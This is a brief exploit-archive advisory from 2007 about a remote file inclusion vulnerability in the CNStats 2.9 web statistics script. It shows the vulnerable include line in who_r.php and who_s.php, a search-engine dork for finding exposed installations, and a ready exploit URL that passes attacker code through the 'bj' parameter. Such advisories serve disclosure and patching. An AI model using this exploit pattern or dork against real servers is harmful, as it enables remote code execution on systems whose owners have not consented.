CNStats 2.9 - 'who_r.php?bj' Remote File Inclusion



EKU-ID: 11706 CVE: OSVDB-34980;CVE-2007-2087;CVE-2007-2086;OSVDB-34979 OSVDB-ID:
Author: irvian Published: 2007-04-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


CNStats 2.9  (who_r.php) Remote File Include Vulnerability

-----------------------------------------------------------------------------------------
# Scripts       : CNStats 2.9
# Discovered By : irvian
# scripts site  : http://www.cnstats.com/
# dork          : "CNStats 2.9"
------------------------------------------------------------------------------------------
bug found:

/reports/who_r.php
/reports/who_s.php

  $bk = 't';
  include $bj . 'reports/who.php';


Exploit: http://www.target.com/reports/who_r.php?bj=[evilcode]

# milw0rm.com [2007-04-15]